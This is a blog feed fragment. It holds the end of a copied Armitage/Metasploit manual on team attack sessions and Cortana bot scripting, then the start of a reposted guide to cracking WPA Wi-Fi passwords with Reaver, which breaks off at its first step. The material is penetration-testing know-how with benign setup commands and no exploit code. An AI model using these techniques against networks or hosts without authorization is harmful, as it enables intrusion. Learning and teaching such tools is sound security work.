&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Some Metasploit modules require you to specify one or more files. If a file option has a ✚ next to it, then you may double-click that option name to choose a local file to use. Armitage will upload the chosen local file and set the option to its remote location for you. Generally, Armitage will do its best to move files between you and the shared Metasploit server to create the illusion that you&#39;re using Metasploit locally.&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;tip&quot; style=&quot;border: 1px dashed rgb(136, 136, 136); font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-bottom: 1em; margin-left: 4em; margin-right: 4em; padding: 1em 1em 15px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Penetration testers will find this feature invaluable. Imagine you&#39;re working on a pen test and come across a system you don&#39;t know much about. You can reach back to your company and ask your local expert to load Armitage and connect to the same Metasploit instance. They will immediately have access to your scan data and they can interact with your existing sessions... seamlessly.&lt;br /&gt;&lt;br /&gt;Or, imagine that you&#39;re simulating a phishing attack and you get access to a host. Your whole team can now work on the same host. One person can search for data, another can set up a pivot and search for internal hosts to attack, and another can work on persistence. The sky is the limit here.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Some meterpreter commands may have shortened output. Multi-player Armitage takes the initial output from a command and delivers it to the client that sent the command. Additional output is ignored (although the command still executes normally). This limitation primarily affects long running meterpreter scripts.&lt;/span&gt;&lt;/div&gt;
&lt;h1 style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 24px; line-height: 20px; margin: 0px auto; padding-bottom: 16px; text-shadow: rgb(51, 51, 51) 4px 4px 8px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;9. Scripting Armitage&lt;/span&gt;&lt;/h1&gt;
&lt;h2 style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 19px; line-height: 20px; margin: 0px auto; padding-bottom: 12px; text-shadow: rgb(51, 51, 51) 2px 2px 4px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;9.1 Cortana&lt;/span&gt;&lt;/h2&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Armitage includes&amp;nbsp;&lt;a href=&quot;http://www.fastandeasyhacking.com/download/cortana/cortana_tutorial.pdf&quot;&gt;Cortana&lt;/a&gt;, a scripting technology developed through DARPA&#39;s Cyber Fast Track program. With Cortana, you may write red team bots and extend Armitage with new features. You may also make use of&amp;nbsp;&lt;a href=&quot;https://github.com/rsmudge/cortana-scripts&quot;&gt;scripts written by others&lt;/a&gt;.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Cortana is based on&amp;nbsp;&lt;a href=&quot;http://sleep.dashnine.org/&quot;&gt;Sleep&lt;/a&gt;, an extensible Perl-like language. Cortana scripts have a .cna suffix.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Read the&amp;nbsp;&lt;a href=&quot;http://www.fastandeasyhacking.com/download/cortana/cortana_tutorial.pdf&quot;&gt;Cortana Tutorial&lt;/a&gt;&amp;nbsp;to learn more about how to develop bots and extend Armitage.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px; text-align: center;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;img alt=&quot;Cortana Architecture&quot; src=&quot;http://www.fastandeasyhacking.com/images/architecture_cortana.png&quot; width=&quot;45%&quot; /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;h2 style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 19px; line-height: 20px; margin: 0px auto; padding-bottom: 12px; text-shadow: rgb(51, 51, 51) 2px 2px 4px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;9.2 Stand-alone Bots&lt;/span&gt;&lt;/h2&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;A stand-alone version of Cortana is distributed with Armitage. You may connect the stand-alone Cortana interpreter to an Armitage team server.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Here&#39;s a&amp;nbsp;&lt;em&gt;helloworld.cna&lt;/em&gt;&amp;nbsp;Cortana script:&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px; white-space: pre;&quot;&gt;
&lt;code style=&quot;background-color: white;&quot;&gt;on ready {
 println(&quot;Hello World!&quot;);
 quit();
}&lt;/code&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;To run this script, you will need to start Cortana. First, stand-alone Cortana must connect to a&amp;nbsp;&lt;a href=&quot;http://www.fastandeasyhacking.com/manual#multi&quot;&gt;team server&lt;/a&gt;. The team server is required because Cortana bots are&amp;nbsp;&lt;em&gt;another&lt;/em&gt;&amp;nbsp;red team member. If you want to connect multiple users to Metasploit, you have to start a team server.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Next, you will need to create a&amp;nbsp;&lt;em&gt;connect.prop&lt;/em&gt;&amp;nbsp;file to tell Cortana how to connect to the team server you started. Here&#39;s an example&amp;nbsp;&lt;em&gt;connect.prop&lt;/em&gt;&amp;nbsp;file:&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px; white-space: pre;&quot;&gt;
&lt;code style=&quot;background-color: white;&quot;&gt;host=127.0.0.1
port=55553
user=msf
pass=password
nick=MyBot&lt;/code&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Now, to launch your bot:&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;code style=&quot;background-color: white;&quot;&gt;cd /path/to/metasploit/msf3/data/armitage&lt;br /&gt;java -jar cortana.jar connect.prop helloworld.cna&lt;/code&gt;&lt;/div&gt;
&lt;h2 style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 19px; line-height: 20px; margin: 0px auto; padding-bottom: 12px; text-shadow: rgb(51, 51, 51) 2px 2px 4px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;9.3 Script Management&lt;/span&gt;&lt;/h2&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;You don&#39;t have to run Cortana bots stand-alone. You may load any bot into Armitage directly. When you load a bot into Armitage, you do not need to start a teamserver. Armitage is able to deconflict its actions from any loaded bots on its own.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;You may also use Cortana scripts to extend Armitage and add new features to it. Cortana scripts may define keyboard shortcuts, insert menus into Armitage, and create simple user interfaces.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;To load a script into Armitage, go to&amp;nbsp;Armitage&amp;nbsp;-&amp;gt;&amp;nbsp;Scripts. Press&amp;nbsp;Load&amp;nbsp;and choose the script you would like to load. Scripts loaded in this way will be available each time Armitage starts.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Output generated by bots and Cortana commands are available in the Cortana console. Go to&amp;nbsp;View&amp;nbsp;-&amp;gt;&amp;nbsp;Script Console.&lt;/span&gt;&lt;/div&gt;
&lt;h2 style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 19px; line-height: 20px; margin: 0px auto; padding-bottom: 12px; text-shadow: rgb(51, 51, 51) 2px 2px 4px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;9.4 Resources&lt;/span&gt;&lt;/h2&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Cortana is a full featured environment for developing red team bots and extending Armitage. If you&#39;d like to learn more, take a look at the following resources:&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;a href=&quot;http://www.blogger.com/blogger.g?blogID=3274283599470026861&quot; name=&quot;1&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; text-decoration: underline;&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://www.blogger.com/blogger.g?blogID=3274283599470026861&quot; name=&quot;kali&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; text-decoration: underline;&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://www.blogger.com/blogger.g?blogID=3274283599470026861&quot; name=&quot;backtrack&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; text-decoration: underline;&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://www.blogger.com/blogger.g?blogID=3274283599470026861&quot; name=&quot;linux&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; text-decoration: underline;&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://www.blogger.com/blogger.g?blogID=3274283599470026861&quot; name=&quot;windows&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; text-decoration: underline;&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://www.blogger.com/blogger.g?blogID=3274283599470026861&quot; name=&quot;msfupdate&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; text-decoration: underline;&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://www.blogger.com/blogger.g?blogID=3274283599470026861&quot; name=&quot;2&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; text-decoration: underline;&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://www.blogger.com/blogger.g?blogID=3274283599470026861&quot; name=&quot;3&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; text-decoration: underline;&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://www.blogger.com/blogger.g?blogID=3274283599470026861&quot; name=&quot;4&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; text-decoration: underline;&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://www.blogger.com/blogger.g?blogID=3274283599470026861&quot; name=&quot;payloads&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; text-decoration: underline;&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://www.blogger.com/blogger.g?blogID=3274283599470026861&quot; name=&quot;5&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; text-decoration: underline;&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://www.blogger.com/blogger.g?blogID=3274283599470026861&quot; name=&quot;6&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; text-decoration: underline;&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://www.blogger.com/blogger.g?blogID=3274283599470026861&quot; name=&quot;7&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; text-decoration: underline;&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://www.blogger.com/blogger.g?blogID=3274283599470026861&quot; name=&quot;multi&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; text-decoration: underline;&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://www.blogger.com/blogger.g?blogID=3274283599470026861&quot; name=&quot;8&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; text-decoration: underline;&quot;&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;ul style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-top: 0px; padding-top: 0px;&quot;&gt;
&lt;li&gt;&lt;a href=&quot;http://www.fastandeasyhacking.com/download/cortana/cortana_tutorial.pdf&quot; style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;Cortana Tutorial for Scripters&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/rsmudge/cortana-scripts&quot; style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;Public Cortana Script Repository&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;background-color: white;&quot;&gt;&lt;a href=&quot;http://sleep.dashnine.org/&quot; style=&quot;background-color: white;&quot;&gt;Sleep Manual&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div&gt;
&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;span style=&quot;line-height: 20px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;span style=&quot;line-height: 20px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;span style=&quot;line-height: 20px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;span style=&quot;line-height: 20px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 20px;&quot;&gt;&lt;a href=&quot;http://www.fastandeasyhacking.com/manual&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;credit&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;span style=&quot;line-height: 20px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://toxiccloud.blogspot.com/feeds/5113886452527283312/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://toxiccloud.blogspot.com/2013/07/armitage.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3274283599470026861/posts/default/5113886452527283312'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3274283599470026861/posts/default/5113886452527283312'/><link rel='alternate' type='text/html' href='http://toxiccloud.blogspot.com/2013/07/armitage.html' title='Armitage'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/15337053438654229797</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3274283599470026861.post-3983008578014521919</id><published>2013-07-29T05:27:00.003-07:00</published><updated>2013-07-29T05:30:06.737-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="wireless"/><title type='text'>Crack wifi WPA</title><content type='html'>&lt;div class=&quot;first-text&quot; data-textannotation-id=&quot;8c42f736c8ee98c3e385a54e9eb929d4&quot; style=&quot;background-color: whitesmoke; box-sizing: border-box; color: #222222; direction: ltr; font-family: Georgia, serif; font-size: 15px; line-height: 1.6; margin-bottom: 19px; max-width: 100%; padding: 0px 18px; word-break: break-word;&quot;&gt;
Crack WPA&lt;/div&gt;
&lt;div class=&quot;first-text&quot; data-textannotation-id=&quot;8c42f736c8ee98c3e385a54e9eb929d4&quot; style=&quot;background-color: whitesmoke; box-sizing: border-box; color: #222222; direction: ltr; font-family: Georgia, serif; font-size: 15px; line-height: 1.6; margin-bottom: 19px; max-width: 100%; padding: 0px 18px; word-break: break-word;&quot;&gt;
Your Wi-Fi network is your conveniently wireless gateway to the internet, and since you&#39;re not keen on sharing your connection with any old hooligan who happens to be walking past your home, you secure your network with a password, right? Knowing, as you might, how&amp;nbsp;&lt;span style=&quot;color: #709602;&quot;&gt;&lt;span style=&quot;box-sizing: border-box; line-height: inherit;&quot;&gt;easy it is to crack a WEP password&lt;/span&gt;&lt;/span&gt;, you probably secure your network using the more bulletproof WPA security protocol.&lt;/div&gt;
&lt;div data-textannotation-id=&quot;6f68a58cf658d7cbaaea85d462447eaa&quot; style=&quot;background-color: whitesmoke; box-sizing: border-box; color: #222222; direction: ltr; font-family: Georgia, serif; font-size: 15px; line-height: 1.6; margin-bottom: 19px; max-width: 100%; padding: 0px 18px; word-break: break-word;&quot;&gt;
Here&#39;s the bad news: A new, free, open-source tool called&amp;nbsp;&lt;span style=&quot;color: #709602;&quot;&gt;&lt;span style=&quot;box-sizing: border-box; line-height: inherit;&quot;&gt;Reaver&lt;/span&gt;&lt;/span&gt;&amp;nbsp;exploits a security hole in wireless routers and can crack most routers&#39; current passwords with relative ease. Here&#39;s how to crack a WPA or WPA2 password, step by step, with Reaver—and how to protect your network against Reaver attacks.&lt;/div&gt;
&lt;div data-textannotation-id=&quot;b71b3105cd9f8b9fc833b8816d2c32a9&quot; style=&quot;background-color: whitesmoke; box-sizing: border-box; color: #222222; direction: ltr; font-family: Georgia, serif; font-size: 15px; line-height: 1.6; margin-bottom: 19px; max-width: 100%; padding: 0px 18px; word-break: break-word;&quot;&gt;
In the first section of this post, I&#39;ll walk through the steps required to crack a WPA password using Reaver. You can follow along with either the video or the text below. After that, I&#39;ll explain how Reaver works, and what you can do to protect your network against Reaver attacks.&lt;/div&gt;
&lt;div data-textannotation-id=&quot;de94372a395c40404de3d1dc5999caad&quot; style=&quot;background-color: whitesmoke; box-sizing: border-box; color: #222222; direction: ltr; font-family: Georgia, serif; font-size: 15px; line-height: 1.6; margin-bottom: 19px; max-width: 100%; padding: 0px 18px; word-break: break-word;&quot;&gt;
&lt;em style=&quot;box-sizing: border-box; line-height: inherit;&quot;&gt;First, a quick note:&lt;/em&gt;&amp;nbsp;As we remind often remind readers when we discuss topics that appear potentially malicious: Knowledge is power, but power doesn&#39;t mean you should be a jerk, or do anything illegal. Knowing how to pick a lock doesn&#39;t make you a thief. Consider this post educational, or a proof-of-concept intellectual exercise. The more you know, the better you can protect yourself.&lt;/div&gt;
&lt;h3 data-textannotation-id=&quot;a1e7373e859a20058331f19cff46167f&quot; style=&quot;background-color: whitesmoke; box-sizing: border-box; direction: ltr; font-family: ProximaNovaCond, serif; font-size: 25px; line-height: 1.1; margin: 16px 0px; max-width: 100%; padding: 0px 18px; text-rendering: optimizelegibility;&quot;&gt;
What You&#39;ll Need&lt;/h3&gt;
&lt;div data-textannotation-id=&quot;7a2d3d7b938a85df2a76a2c05d7aff34&quot; style=&quot;background-color: whitesmoke; box-sizing: border-box; color: #222222; direction: ltr; font-family: Georgia, serif; font-size: 15px; line-height: 1.6; margin-bottom: 19px; max-width: 100%; padding: 0px 18px; word-break: break-word;&quot;&gt;
You don&#39;t have to be a networking wizard to use Reaver, the command-line tool that does the heavy lifting, and if you&#39;ve got a blank DVD, a computer with compatible Wi-Fi, and a few hours on your hands, you&#39;ve got basically all you&#39;ll need. There are a number of ways you could set up Reaver, but here are the specific requirements for this guide:&lt;/div&gt;
&lt;ul style=&quot;background-color: whitesmoke; box-sizing: border-box; color: #222222; direction: ltr; font-family: Georgia, serif; font-size: 16px; line-height: 25px; list-style-position: inside; list-style-type: none; margin: 0px 0px 19px; max-width: 100%; padding: 0px 18px; position: relative;&quot;&gt;
&lt;li data-textannotation-id=&quot;643bcd16c774ecb5d51090d4cd41d0aa&quot; style=&quot;box-sizing: border-box; direction: ltr; font-size: 15px; margin: 0px 0px 6px; padding: 0px 0px 0px 35px;&quot;&gt;&lt;span class=&quot;img-border&quot; style=&quot;box-sizing: border-box; color: #709602; display: inline-block; line-height: inherit; position: relative; text-decoration: none;&quot;&gt;&lt;img alt=&quot;How to Crack a Wi-Fi Network&#39;s WPA Password with Reaver&quot; class=&quot;transform-original&quot; height=&quot;442&quot; src=&quot;http://img.gawkerassets.com/img/18fblipptywm3jpg/original.jpg&quot; style=&quot;border: none; box-sizing: border-box; display: block; height: auto; max-width: 100%;&quot; width=&quot;300&quot; /&gt;&lt;/span&gt;&lt;strong style=&quot;box-sizing: border-box; color: #709602; line-height: inherit; text-decoration: none;&quot;&gt;&lt;span style=&quot;box-sizing: border-box; line-height: inherit;&quot;&gt;The BackTrack 5 Live DVD&lt;/span&gt;.&lt;/strong&gt;&lt;span style=&quot;color: #709602;&quot;&gt;&lt;span style=&quot;box-sizing: border-box; line-height: inherit;&quot;&gt;&amp;nbsp;BackTrack is a bootable Linux distribution that&#39;s filled to the brim with network testing tools, and while it&#39;s not strictly required to use Reaver, it&#39;s the easiest approach for most users. Download the Live DVD&amp;nbsp;from BackTrack&#39;s download page&lt;/span&gt;&lt;/span&gt;&amp;nbsp;and burn it to a DVD. You can alternately download a virtual machine image if you&#39;re using VMware, but if you don&#39;t know what VMware is, just stick with the Live DVD. As of this writing, that means you should select BackTrack 5 R1 from the Release drop-down, select Gnome, 32- or 64-bit depending on your CPU (if you don&#39;t know which you have, 32 is a safe bet), ISO for image, and then download the ISO.&lt;/li&gt;
&lt;li data-textannotation-id=&quot;2ec12599ae9b831968af4f0e2a0ae3e0&quot; style=&quot;box-sizing: border-box; direction: ltr; font-size: 15px; margin: 0px 0px 6px; padding: 0px 0px 0px 35px;&quot;&gt;&lt;strong style=&quot;box-sizing: border-box; line-height: inherit;&quot;&gt;A computer with Wi-Fi and a DVD drive.&lt;/strong&gt;&amp;nbsp;BackTrack will work with the wireless card on most laptops, so chances are your laptop will work fine. However, BackTrack doesn&#39;t have a full compatibility list, so no guarantees. You&#39;ll also need a DVD drive, since that&#39;s how you&#39;ll boot into BackTrack. I used a six-year-old MacBook Pro.&lt;/li&gt;
&lt;li data-textannotation-id=&quot;9891f1f72796fc097ad3d6f299dc457a&quot; style=&quot;box-sizing: border-box; direction: ltr; font-size: 15px; margin: 0px 0px 6px; padding: 0px 0px 0px 35px;&quot;&gt;&lt;strong style=&quot;box-sizing: border-box; line-height: inherit;&quot;&gt;A nearby WPA-secured Wi-Fi network.&lt;/strong&gt;&amp;nbsp;Technically, it will need to be a network using WPA security with the WPS feature enabled. I&#39;ll explain in more detail in the &quot;How Reaver Works&quot; section how WPS creates the security hole that makes WPA cracking possible.&lt;/li&gt;
&lt;li data-textannotation-id=&quot;b7cccd6606472fefa3d1fcc5d39a62f6&quot; style=&quot;box-sizing: border-box; direction: ltr; font-size: 15px; margin: 0px 0px 6px; padding: 0px 0px 0px 35px;&quot;&gt;&lt;strong style=&quot;box-sizing: border-box; line-height: inherit;&quot;&gt;A little patience.&lt;/strong&gt;&amp;nbsp;This is a 4-step process, and while it&#39;s not terribly difficult to crack a WPA password with Reaver, it&#39;s a brute-force attack, which means your computer will be testing a number of different combinations of cracks on your router before it finds the right one. When I tested it, Reaver took roughly 2.5 hours to successfully crack my password. The&amp;nbsp;&lt;span style=&quot;color: #709602;&quot;&gt;&lt;span style=&quot;box-sizing: border-box; line-height: inherit;&quot;&gt;Reaver home page&lt;/span&gt;&lt;/span&gt;&amp;nbsp;suggests it can take anywhere from 4-10 hours. Your mileage may vary.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 data-textannotation-id=&quot;e4ca4017f18d2a96b8633c31fbedb908&quot; style=&quot;background-color: whitesmoke; box-sizing: border-box; direction: ltr; font-family: ProximaNovaCond, serif; font-size: 25px; line-height: 1.1; margin: 16px 0px; max-width: 100%; padding: 0px 18px; text-rendering: optimizelegibility;&quot;&gt;
Let&#39;s Get Crackin&#39;&lt;/h3&gt;
&lt;div data-textannotation-id=&quot;ce31795f62ea47b49d9adb2e80866d07&quot; style=&quot;background-color: whitesmoke; box-sizing: border-box; color: #222222; direction: ltr; font-family: Georgia, serif; font-size: 15px; line-height: 1.6; margin-bottom: 19px; max-width: 100%; padding: 0px 18px; word-break: break-word;&quot;&gt;
At this point you should have BackTrack burned to a DVD, and you should have your laptop handy.&lt;/div&gt;
&lt;h4 data-textannotation-id=&quot;bb920f917c1fc3dc4b31f8fc7336d746&quot; style=&quot;background-color: whitesmoke; box-sizing: border-box; direction: ltr; font-family: ProximaNovaCond, serif; font-size: 21px; line-height: 1.1; margin: 16px 0px; max-width: 100%; padding: 0px 18px; text-rendering: optimizelegibility;&quot;&gt;
Step 1: Boot into BackTrack&lt;/h4&gt;
&lt;div class=&quot;has-media media-640&quot; data-textannotation-id=&quot;6b74e8c3a80b988720b1dfa8dab76396&quot; style=&quot;background-color: whitesmoke; box-sizing: border-box; color: #222222; direction: ltr; font-family: Georgia, serif; font-size: 15px; line-height: 1.6; max-width: 100%; padding: 0px 18px; width: 672px; word-break: break-word;&quot;&gt;
&lt;span class=&quot;lightBoxWrapper&quot; style=&quot;box-sizing: border-box; display: block; position: relative;&quot;&gt;&lt;span class=&quot;img-border&quot; style=&quot;box-sizing: border-box; clear: both; display: inline-block; margin-bottom: 10px; position: relative;&quot;&gt;&lt;img alt=&quot;How to Crack a Wi-Fi Network&#39;s WPA Password with Reaver&quot; class=&quot;transform-ku-xlarge&quot; height=&quot;429&quot; src=&quot;http://img.gawkerassets.com/img/18ix7n6uga4u4jpg/ku-xlarge.jpg&quot; style=&quot;box-sizing: border-box; display: block; height: auto; margin-bottom: 0px; max-width: 100%;&quot; width=&quot;640&quot; /&gt;&lt;/span&gt;&lt;span class=&quot;magnifier lightBox&quot; style=&quot;background-color: rgba(0, 0, 0, 0.6); bottom: 18px; box-sizing: border-box; cursor: pointer; line-height: 21px; min-width: 75px; position: absolute; right: 1px;&quot;&gt;&lt;span class=&quot;icon icon-white notranslate&quot; style=&quot;-webkit-user-select: none; bottom: -2px; box-sizing: border-box; color: white; display: inline-block; font-family: KinjaIcons; font-size: 16px; height: 16px; left: 3px; line-height: 16px; margin-top: 1px; opacity: 0.6; position: relative; text-align: center; vertical-align: top; width: 16px;&quot;&gt;S&lt;/span&gt;&lt;span class=&quot;text&quot; style=&quot;box-sizing: border-box; color: white; font-family: ProximaNovaCond; font-size: 12px; margin: 1px 5px 0px 8px; opacity: 0.6; text-transform: uppercase;&quot;&gt;EXPAND&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div data-textannotation-id=&quot;219c201e5b949590e20410eceac49715&quot; style=&quot;background-color: whitesmoke; box-sizing: border-box; color: #222222; direction: ltr; font-family: Georgia, serif; font-size: 15px; line-height: 1.6; margin-bottom: 19px; max-width: 100%; padding: 0px 18px; word-break: break-word;&quot;&gt;
